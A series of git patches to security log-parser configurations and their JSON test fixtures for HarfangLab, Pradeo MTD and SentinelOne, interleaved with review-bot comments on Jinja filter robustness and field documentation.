+++ b/HarfangLab/harfanglab/tests/threat_log.json
@@ -10,6 +10,7 @@
"start": "2024-02-07T15:18:00Z"
},
"agent": {
+ "id": "215fe295-905f-4a8d-8347-e9d438d4e415",
"name": "harfanglab"
},
"harfanglab": {
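Review bot: The filter `{{json_event.message.agents | length > 0}}` on the new `set` action is only safe when `agents` is absent or a list: under Jinja2 semantics a missing key yields an Undefined whose length is 0, but an explicit `"agents": null` makes `length` call `len(None)` and the template errors out, so depending on how the pipeline treats template failures the whole event may be rejected instead of just skipping `agent.id` — worth confirming against the intake's engine. A guard such as `filter: "{{json_event.message.agents is iterable and json_event.message.agents | length > 0}}"` keeps the action skipped in both cases. The same filter line is carried unchanged into the two later HarfangLab commits in this series (PATCH 316 and 317), so the fix applies there as well. The `actions` list this `set` belongs to starts before the hunk.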
From e927ad7740757db69157c57ffde80af5277eb184 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 10 Dec 2024 15:07:44 +0100 Subject: [PATCH 314/317] Pradeoo: fix on Pradeo MTD parser for application compliance
--- Pradeo/pradeo-mtd/ingest/parser.yml | 20 +++---- .../tests/application_compliance_updated.json | 55 +++++++++++++++++++ 2 files changed, 65 insertions(+), 10 deletions(-) create mode 100644 Pradeo/pradeo-mtd/tests/application_compliance_updated.json
diff --git a/Pradeo/pradeo-mtd/ingest/parser.yml b/Pradeo/pradeo-mtd/ingest/parser.yml
index 239ce01d4..c10d3c444 100644
--- a/Pradeo/pradeo-mtd/ingest/parser.yml
+++ b/Pradeo/pradeo-mtd/ingest/parser.yml
@@ -176,16 +176,16 @@ stages: pradeo.device.mdmId: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.device.emmDeviceInfo.externalId}}" pradeo.device.emm: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.device.emmDeviceInfo.emm}}" pradeo.compliance.matchedResponseRules: "{{json_event.message.content.deviceApplication.compliance.matchedResponseRules}}" - pradeo.application.id: "{{json_event.message.content.deviceApplicationCompliance.application.id}}" - pradeo.application.package: "{{json_event.message.content.deviceApplicationCompliance.application.package.package}}" - pradeo.application.system: "{{json_event.message.content.deviceApplicationCompliance.application.package.system}}" - pradeo.application.version: "{{json_event.message.content.deviceApplicationCompliance.application.version}}" - pradeo.application.versionCode: "{{json_event.message.content.deviceApplicationCompliance.application.versionCode}}" - pradeo.application.name: "{{json_event.message.content.deviceApplicationCompliance.application.name}}" - pradeo.application.md5: "{{json_event.message.content.deviceApplicationCompliance.application.md5}}" - pradeo.application.sha1: "{{json_event.message.content.deviceApplicationCompliance.application.sha1}}" - pradeo.application.sha256: "{{json_event.message.content.deviceApplicationCompliance.application.sha256}}" - pradeo.detection.status: "{{json_event.message.content.deviceApplicationCompliance.status}}" + pradeo.application.id: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.id}}" + pradeo.application.package: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.package.package}}" + pradeo.application.system: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.package.system}}" + pradeo.application.version: 
"{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.version}}" + pradeo.application.versionCode: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.versionCode}}" + pradeo.application.name: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.name}}" + pradeo.application.md5: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.md5}}" + pradeo.application.sha1: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.sha1}}" + pradeo.application.sha256: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.sha256}}" + pradeo.detection.status: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.status}}" - filter: '{{json_event.message.type == "DeviceComplianceUpdated"}}' set: event.category: ["process"] diff --git a/Pradeo/pradeo-mtd/tests/application_compliance_updated.json b/Pradeo/pradeo-mtd/tests/application_compliance_updated.json new file mode 100644 index 000000000..916f71473 --- /dev/null +++ b/Pradeo/pradeo-mtd/tests/application_compliance_updated.json 
@@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\n \"id\": \"1234567890\",\n \"creationDate\": \"2024-11-27T04:10:33.460Z\",\n \"source\": \"system\",\n \"category\": null,\n \"type\": \"DeviceApplicationComplianceUpdated\",\n \"content\": {\n \"deviceApplicationCompliance\": {\n \"id\": \"abcdef123456\",\n \"status\": \"Disapproved\",\n \"computed\": true,\n \"creationDate\": \"2024-11-27T04:04:26.482Z\",\n \"lastModificationDate\": \"2024-11-27T04:10:33.000Z\",\n \"deviceApplication\": {\n \"id\": \"123456789ABCDEF\",\n \"application\": {\n \"id\": \"azertyuiop\",\n \"package\": {\n \"id\": \"1234abcd\",\n \"package\": \"com.app.test\",\n \"system\": \"Android\"\n },\n \"version\": \"491.0.0.58.78\",\n \"md5\": \"0fccfdefc882c4be6d2a938001184e08\",\n \"sha1\": \"749c94cd972726ef2b3ccda7e718a2034cc9f6ac\",\n \"sha256\": \"278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8\",\n \"name\": \"App\",\n \"versionCode\": \"457215664\",\n \"size\": \"64262264\"\n },\n \"device\": {\n \"id\": \"device_id01\",\n \"serialNumber\": \"unknown\",\n \"imei\": null,\n \"name\": \"John\",\n \"email\": null,\n \"singleEnrollmentKey\": \"xxxxxXXXXxxXxxx\",\n \"byod\": false,\n \"lockPassword\": null,\n \"knoxVersion\": null,\n \"declaredOperatingSystem\": \"Android\",\n \"declaredOperatingSystemVersion\": \"10.0.0\",\n \"declaredOperatingSystemSecurityPatchDate\": \"2020-09-01T00:00:00.000Z\",\n \"declaredModel\": \"MODEL 01\",\n \"enrollmentStatus\": {\n \"id\": \"enrollid_12\",\n \"lastConnection\": \"2024-11-27T04:07:32.000Z\",\n \"coupled\": true\n },\n \"emmDeviceInfo\": null\n },\n \"installedAt\": \"2024-08-07T13:40:35.000Z\",\n \"uninstalledAt\": null,\n \"native\": false\n },\n \"matchedResponseRules\": [\n {\n \"id\": \"matched_response_id\",\n \"matchConditions\": [\n {\n \"type\": \"threatLevelIs\",\n \"value\": \"Red\"\n }\n ],\n \"notifyAdministrator\": false,\n \"onDeviceNotification\": false,\n \"action\": \"Disapproved\",\n \"responseRuleset\": {\n 
\"id\": \"yMXqFSTMT8uDn1ijwCmEGA\",\n \"name\": \"FallBack\",\n \"active\": true,\n \"type\": \"FallBack\",\n \"priority\": 0\n },\n \"priority\": 0\n }\n ]\n }\n },\n \"user\": null,\n \"device\": null,\n \"company\": {\n \"id\": \"ROhGBpGHSi2gpVagfb4FhQ\",\n \"name\": \"LAB\",\n \"creationDate\": \"2024-04-15T15:31:33.395Z\",\n \"lastModificationDate\": \"2024-08-07T13:23:42.000Z\",\n \"deletedAt\": null\n }\n}", + "sekoiaio": { + "intake": { + "dialect": "Pradeo MTD", + "dialect_uuid": "3cedbe29-02f8-42bf-9ec2-0158186c2827" + } + } + }, + "expected": { + "message": "{\n \"id\": \"1234567890\",\n \"creationDate\": \"2024-11-27T04:10:33.460Z\",\n \"source\": \"system\",\n \"category\": null,\n \"type\": \"DeviceApplicationComplianceUpdated\",\n \"content\": {\n \"deviceApplicationCompliance\": {\n \"id\": \"abcdef123456\",\n \"status\": \"Disapproved\",\n \"computed\": true,\n \"creationDate\": \"2024-11-27T04:04:26.482Z\",\n \"lastModificationDate\": \"2024-11-27T04:10:33.000Z\",\n \"deviceApplication\": {\n \"id\": \"123456789ABCDEF\",\n \"application\": {\n \"id\": \"azertyuiop\",\n \"package\": {\n \"id\": \"1234abcd\",\n \"package\": \"com.app.test\",\n \"system\": \"Android\"\n },\n \"version\": \"491.0.0.58.78\",\n \"md5\": \"0fccfdefc882c4be6d2a938001184e08\",\n \"sha1\": \"749c94cd972726ef2b3ccda7e718a2034cc9f6ac\",\n \"sha256\": \"278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8\",\n \"name\": \"App\",\n \"versionCode\": \"457215664\",\n \"size\": \"64262264\"\n },\n \"device\": {\n \"id\": \"device_id01\",\n \"serialNumber\": \"unknown\",\n \"imei\": null,\n \"name\": \"John\",\n \"email\": null,\n \"singleEnrollmentKey\": \"xxxxxXXXXxxXxxx\",\n \"byod\": false,\n \"lockPassword\": null,\n \"knoxVersion\": null,\n \"declaredOperatingSystem\": \"Android\",\n \"declaredOperatingSystemVersion\": \"10.0.0\",\n \"declaredOperatingSystemSecurityPatchDate\": \"2020-09-01T00:00:00.000Z\",\n \"declaredModel\": \"MODEL 01\",\n 
\"enrollmentStatus\": {\n \"id\": \"enrollid_12\",\n \"lastConnection\": \"2024-11-27T04:07:32.000Z\",\n \"coupled\": true\n },\n \"emmDeviceInfo\": null\n },\n \"installedAt\": \"2024-08-07T13:40:35.000Z\",\n \"uninstalledAt\": null,\n \"native\": false\n },\n \"matchedResponseRules\": [\n {\n \"id\": \"matched_response_id\",\n \"matchConditions\": [\n {\n \"type\": \"threatLevelIs\",\n \"value\": \"Red\"\n }\n ],\n \"notifyAdministrator\": false,\n \"onDeviceNotification\": false,\n \"action\": \"Disapproved\",\n \"responseRuleset\": {\n \"id\": \"yMXqFSTMT8uDn1ijwCmEGA\",\n \"name\": \"FallBack\",\n \"active\": true,\n \"type\": \"FallBack\",\n \"priority\": 0\n },\n \"priority\": 0\n }\n ]\n }\n },\n \"user\": null,\n \"device\": null,\n \"company\": {\n \"id\": \"ROhGBpGHSi2gpVagfb4FhQ\",\n \"name\": \"LAB\",\n \"creationDate\": \"2024-04-15T15:31:33.395Z\",\n \"lastModificationDate\": \"2024-08-07T13:23:42.000Z\",\n \"deletedAt\": null\n }\n}", + "event": { + "action": "DeviceApplicationComplianceUpdated", + "category": [ + "process" + ], + "type": [ + "change" + ] + }, + "@timestamp": "2024-11-27T04:10:33.460000Z", + "pradeo": { + "application": { + "id": "azertyuiop", + "md5": "0fccfdefc882c4be6d2a938001184e08", + "name": "App", + "package": "com.app.test", + "sha1": "749c94cd972726ef2b3ccda7e718a2034cc9f6ac", + "sha256": "278fde8924687bf22285d2b4415779d96ba967530cae43272029ec53ecc2eee8", + "system": "Android", + "version": "491.0.0.58.78", + "versionCode": "457215664" + }, + "device": { + "byod": false, + "coupled": true, + "declaredModel": "MODEL 01", + "declaredOperatingSystem": "Android", + "declaredOperatingSystemSecurityPatchDate": "2020-09-01T00:00:00Z", + "declaredOperatingSystemVersion": "10.0.0", + "id": "device_id01", + "lastConnection": "2024-11-27T04:07:32Z", + "name": "John", + "serialNumber": "unknown" + }, + "metadata": { + "creationDate": "2024-11-27T04:10:33.460000Z", + "id": "1234567890", + "source": "system", + "type": 
"DeviceApplicationComplianceUpdated" + } + } + } +} \ No newline at end of file From 6335db5a7e01d89222de436ad488b49a3bc3ae93 Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Tue, 10 Dec 2024 16:26:06 +0200 Subject: [PATCH 315/317] Fix: SentinelOne smart descriptions --- .../_meta/smart-descriptions.json | 52 ++++++++++ .../tests/process_processcreation_2.json | 96 +++++++++++++++++++ 2 files changed, 148 insertions(+) create mode 100644 SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json diff --git a/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json b/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json index 9a4b1bf43..9acf6e91d 100644 --- a/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json +++ b/SentinelOne/cloud_funnel2.0/_meta/smart-descriptions.json @@ -682,6 +682,58 @@ } ] }, + { + "value": "Process {process.command_line} was created by {process.user.name}", + "conditions": [ + { + "field": "event.action", + "value": "Process Creation" + }, + { + "field": "process.user.name" + }, + { + "field": "process.command_line" + } + ], + "relationships": [ + { + "source": "process.user.name", + "target": "process.parent.command_line", + "type": "created" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.title", + "type": "has process title" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "has name" + }, + { + "source": "process.command_line", + "target": "process.title", + "type": "has title" + }, + { + "source": "process.command_line", + "target": "process.name", + "type": "has name" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "created" + }, + { + "source": "process.user.name", + "target": "host.name", + "type": "logged on" + } + ] + }, { "value": "Process {process.command_line} was created by {user.name}", "conditions": [ 
diff --git a/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json b/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json new file mode 100644
index 000000000..62320459c
--- /dev/null
+++ b/SentinelOne/cloud_funnel2.0/tests/process_processcreation_2.json
@@ -0,0 +1,96 @@ +{ + "input": { + "message": "{\"tgt.process.displayName\":\"curl\",\"event.category\":\"process\",\"site.id\":\"1967302198659758782\",\"tgt.process.pid\":30273,\"endpoint.os\":\"osx\",\"tgt.process.name\":\"curl\",\"tgt.process.storyline.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.signedStatus\":\"signed\",\"tgt.process.isNative64Bit\":false,\"mgmt.id\":\"16205\",\"os.name\":\"OS X\",\"tgt.process.cmdline\":\"curl -H User-Agent: test.nvim v1.10.0 (+https:\\/\\/test.test\\/tttttttt\\/test.nvim) -fsSL -X GET -o \\/Users\\/test.user\\/.local\\/share\\/nvim\\/test\\/registries\\/github\\/test-org\\/test-registry\\/registry.json.zip --connect-timeout 30 https:\\/\\/test.test\\/test-org\\/test-registry\\/releases\\/download\\/2024-12-05-doting-coil\\/registry.json.zip\",\"i.version\":\"preprocess-lib-1.0\",\"process.unique.key\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.uid\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.isStorylineRoot\":false,\"mgmt.url\":\"mgm-testing-test.sentinelone.net\",\"agent.version\":\"23.3.1.7037\",\"tgt.process.subsystem\":\"SUBSYSTEM_UNKNOWN\",\"tgt.process.image.sha256\":\"8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42\",\"mgmt.osRevision\":\"14.7.1 
(23H222)\",\"meta.event.name\":\"PROCESSCREATION\",\"group.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.publisher\":\"\",\"tgt.process.startTime\":1733386731479,\"tgt.process.verifiedStatus\":\"verified\",\"endpoint.type\":\"laptop\",\"tgt.process.image.path\":\"\\/usr\\/bin\\/curl\",\"i.scheme\":\"edr\",\"trace.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX\",\"tgt.process.integrityLevel\":\"INTEGRITY_LEVEL_UNKNOWN\",\"site.name\":\"LEDGER\",\"agent.uuid\":\"xxxx-XXXXXX-XXXXx-xxxxx\",\"tgt.process.image.md5\":\"fe61928bbd84ed16fc4f934307bf2f16\",\"event.time\":1733386731479,\"tgt.process.user\":\"test.user\",\"timestamp\":\"2024-12-05T08:18:51.479Z\",\"account.id\":\"1967302197074311859\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"LMFR0205\",\"packet.id\":\"949E7E9F-F1E6-4507-830F-E272AAED8F15\",\"tgt.process.sessionId\":0,\"dataSource.vendor\":\"SentinelOne\",\"dataSource.category\":\"security\",\"tgt.process.isRedirectCmdProcessor\":false,\"tgt.process.image.sha1\":\"e817c506298dc8a2dba727562b6efc60dcf4db1a\",\"account.name\":\"24 - LEDGER\",\"event.type\":\"Process Creation\",\"event.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX_77\"}" + }, + "expected": { + "message": "{\"tgt.process.displayName\":\"curl\",\"event.category\":\"process\",\"site.id\":\"1967302198659758782\",\"tgt.process.pid\":30273,\"endpoint.os\":\"osx\",\"tgt.process.name\":\"curl\",\"tgt.process.storyline.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.signedStatus\":\"signed\",\"tgt.process.isNative64Bit\":false,\"mgmt.id\":\"16205\",\"os.name\":\"OS X\",\"tgt.process.cmdline\":\"curl -H User-Agent: test.nvim v1.10.0 (+https:\\/\\/test.test\\/tttttttt\\/test.nvim) -fsSL -X GET -o \\/Users\\/test.user\\/.local\\/share\\/nvim\\/test\\/registries\\/github\\/test-org\\/test-registry\\/registry.json.zip --connect-timeout 30 
https:\\/\\/test.test\\/test-org\\/test-registry\\/releases\\/download\\/2024-12-05-doting-coil\\/registry.json.zip\",\"i.version\":\"preprocess-lib-1.0\",\"process.unique.key\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.uid\":\"54EDFDFD-139E-4040-A961-59D6F9C33F63\",\"tgt.process.isStorylineRoot\":false,\"mgmt.url\":\"mgm-testing-test.sentinelone.net\",\"agent.version\":\"23.3.1.7037\",\"tgt.process.subsystem\":\"SUBSYSTEM_UNKNOWN\",\"tgt.process.image.sha256\":\"8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42\",\"mgmt.osRevision\":\"14.7.1 (23H222)\",\"meta.event.name\":\"PROCESSCREATION\",\"group.id\":\"EE9FB66D-9B03-4286-971C-7A20615D157B\",\"tgt.process.publisher\":\"\",\"tgt.process.startTime\":1733386731479,\"tgt.process.verifiedStatus\":\"verified\",\"endpoint.type\":\"laptop\",\"tgt.process.image.path\":\"\\/usr\\/bin\\/curl\",\"i.scheme\":\"edr\",\"trace.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX\",\"tgt.process.integrityLevel\":\"INTEGRITY_LEVEL_UNKNOWN\",\"site.name\":\"LEDGER\",\"agent.uuid\":\"xxxx-XXXXXX-XXXXx-xxxxx\",\"tgt.process.image.md5\":\"fe61928bbd84ed16fc4f934307bf2f16\",\"event.time\":1733386731479,\"tgt.process.user\":\"test.user\",\"timestamp\":\"2024-12-05T08:18:51.479Z\",\"account.id\":\"1967302197074311859\",\"dataSource.name\":\"SentinelOne\",\"endpoint.name\":\"LMFR0205\",\"packet.id\":\"949E7E9F-F1E6-4507-830F-E272AAED8F15\",\"tgt.process.sessionId\":0,\"dataSource.vendor\":\"SentinelOne\",\"dataSource.category\":\"security\",\"tgt.process.isRedirectCmdProcessor\":false,\"tgt.process.image.sha1\":\"e817c506298dc8a2dba727562b6efc60dcf4db1a\",\"account.name\":\"24 - LEDGER\",\"event.type\":\"Process Creation\",\"event.id\":\"XXXXXXX-XXXXXXXX-XXXXXXX_77\"}", + "event": { + "action": "Process Creation", + "category": [ + "process" + ], + "dataset": "cloud-funnel-2.0", + "type": [ + "info" + ] + }, + "@timestamp": "2024-12-05T08:18:51.479000Z", + "agent": { + "version": "23.3.1.7037" + }, + "deepvisibility": { + 
"agent": { + "managment_url": "mgm-testing-test.sentinelone.net", + "trace_id": "XXXXXXX-XXXXXXXX-XXXXXXX", + "uuid": "xxxx-XXXXXX-XXXXx-xxxxx" + }, + "event": { + "category": "process", + "type": "Process Creation" + }, + "host": { + "os": { + "revision": "14.7.1 (23H222)" + } + }, + "process": { + "target": { + "command_line": "curl -H User-Agent: test.nvim v1.10.0 (+https://test.test/tttttttt/test.nvim) -fsSL -X GET -o /Users/test.user/.local/share/nvim/test/registries/github/test-org/test-registry/registry.json.zip --connect-timeout 30 https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "executable": "/usr/bin/curl", + "hash": { + "md5": "fe61928bbd84ed16fc4f934307bf2f16", + "sha1": "e817c506298dc8a2dba727562b6efc60dcf4db1a", + "sha256": "8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42" + }, + "name": "curl", + "storyline_id": "EE9FB66D-9B03-4286-971C-7A20615D157B", + "title": "curl", + "working_directory": "/usr/bin" + } + } + }, + "host": { + "name": "LMFR0205", + "os": { + "family": "osx", + "name": "OS X" + }, + "type": "laptop" + }, + "observer": { + "vendor": "SentinelOne" + }, + "process": { + "command_line": "curl -H User-Agent: test.nvim v1.10.0 (+https://test.test/tttttttt/test.nvim) -fsSL -X GET -o /Users/test.user/.local/share/nvim/test/registries/github/test-org/test-registry/registry.json.zip --connect-timeout 30 https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "executable": "/usr/bin/curl", + "hash": { + "md5": "fe61928bbd84ed16fc4f934307bf2f16", + "sha1": "e817c506298dc8a2dba727562b6efc60dcf4db1a", + "sha256": "8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42" + }, + "name": "curl", + "pid": 30273, + "start": "2024-12-05T08:18:51.479000Z", + "title": "curl", + "user": { + "name": "test.user" + }, + "working_directory": "/usr/bin" + }, + "related": { + "hash": [ + 
"8577dde932584e03da0f0230dbca16a11fa4f57b3f8b91033f99e83b5a85fd42", + "e817c506298dc8a2dba727562b6efc60dcf4db1a", + "fe61928bbd84ed16fc4f934307bf2f16" + ] + }, + "url": { + "domain": "test.test", + "original": "https://test.test/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "path": "/test-org/test-registry/releases/download/2024-12-05-doting-coil/registry.json.zip", + "port": 443, + "scheme": "https", + "subdomain": "test" + } + } +} \ No newline at end of file From 061e9656533eac6955dba9be73a10123daef8bdc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Tue, 10 Dec 2024 16:50:08 +0100 Subject: [PATCH 316/317] Update HarfangLab/harfanglab/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- HarfangLab/harfanglab/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 96338037d..c09e780c2 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -143,7 +143,7 @@ stages: url.original: "{{json_event.message.details_url_request.url}}" - set: - agent.id: "{{json_event.message.agents[0].agent_id}}" + harfanglab.agent_ids: "{{json_event.message.agents | map(attribute='agent_id') | list}" filter: "{{json_event.message.agents | length > 0}}" network_info: From cd0a5dc4c25145de4300b3c9fcfda65fd65dcbd3 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 10 Dec 2024 16:57:25 +0100 Subject: [PATCH 317/317] fixes on fields and typo --- HarfangLab/harfanglab/_meta/fields.yml | 5 +++++ HarfangLab/harfanglab/ingest/parser.yml | 2 +- HarfangLab/harfanglab/tests/threat_critical.json | 4 +++- HarfangLab/harfanglab/tests/threat_log.json | 5 ++++- 4 files changed, 13 insertions(+), 3 deletions(-) 
diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml
index 611f3c079..902363c55 100644
--- a/HarfangLab/harfanglab/_meta/fields.yml
+++ b/HarfangLab/harfanglab/_meta/fields.yml
@@ -953,6 +953,11 @@ action.properties.param9:
name: action.properties.param9
type: keyword
+harfanglab.agent_ids:
+ description: ''
+ name: harfanglab.agent_ids
+ type: keyword
+ harfanglab.aggregation_key:
description: The key to the events aggregation
name: harfanglab.aggregation_key
diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index c09e780c2..34535641b 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -143,7 +143,7 @@ stages:
url.original: "{{json_event.message.details_url_request.url}}"
 - set:
- harfanglab.agent_ids: "{{json_event.message.agents | map(attribute='agent_id') | list}"
+ harfanglab.agent_ids: "{{json_event.message.agents | map(attribute='agent_id') | list}}"
filter: "{{json_event.message.agents | length > 0}}"
network_info:
diff --git a/HarfangLab/harfanglab/tests/threat_critical.json b/HarfangLab/harfanglab/tests/threat_critical.json
index e9b50e3db..ce1d2faa4 100644
--- a/HarfangLab/harfanglab/tests/threat_critical.json
+++ b/HarfangLab/harfanglab/tests/threat_critical.json
@@ -10,10 +10,12 @@
"start": "2024-03-19T09:21:00Z"
},
"agent": {
- "id": "af5e2f63-becd-4660-ade8-30d04c0dd044",
"name": "harfanglab"
},
"harfanglab": {
+ "agent_ids": [
+ "af5e2f63-becd-4660-ade8-30d04c0dd044"
+ ],
"count": {
"rules": 1,
"users_impacted": 0
diff --git a/HarfangLab/harfanglab/tests/threat_log.json b/HarfangLab/harfanglab/tests/threat_log.json
index 233ffd066..bed91707b 100644
--- a/HarfangLab/harfanglab/tests/threat_log.json
+++ b/HarfangLab/harfanglab/tests/threat_log.json
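Review bot: `harfanglab.agent_ids` is declared with `description: ''`, so the new field shows up undocumented in the generated taxonomy while its neighbours all carry a sentence. Based on the parser change in the same commit (`agents | map(attribute='agent_id') | list`), a grounded description is `description: Identifiers of the agents listed in the event's agents array`.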
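Review bot: With the brace typo fixed, this `set` action only populates `harfanglab.agent_ids`; the ECS `agent.id` that PATCH 313 introduced is gone, and the fixtures in this commit drop `agent.id` too, so correlation on the standard field no longer works for HarfangLab threat events. Keeping the list and additionally setting `agent.id` when the event names exactly one agent covers both uses: `- set:` / `agent.id: "{{json_event.message.agents[0].agent_id}}"` / `filter: "{{json_event.message.agents | length == 1}}"`. The `actions` list this `set` belongs to starts before the hunk.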
@@ -10,10 +10,13 @@ "start": "2024-02-07T15:18:00Z" }, "agent": { - "id": "215fe295-905f-4a8d-8347-e9d438d4e415", "name": "harfanglab" }, "harfanglab": { + "agent_ids": [ + "215fe295-905f-4a8d-8347-e9d438d4e415", + "999ba0c7-96b8-4c57-bf0e-63b24813c873" + ], "count": { "rules": 4, "users_impacted": 3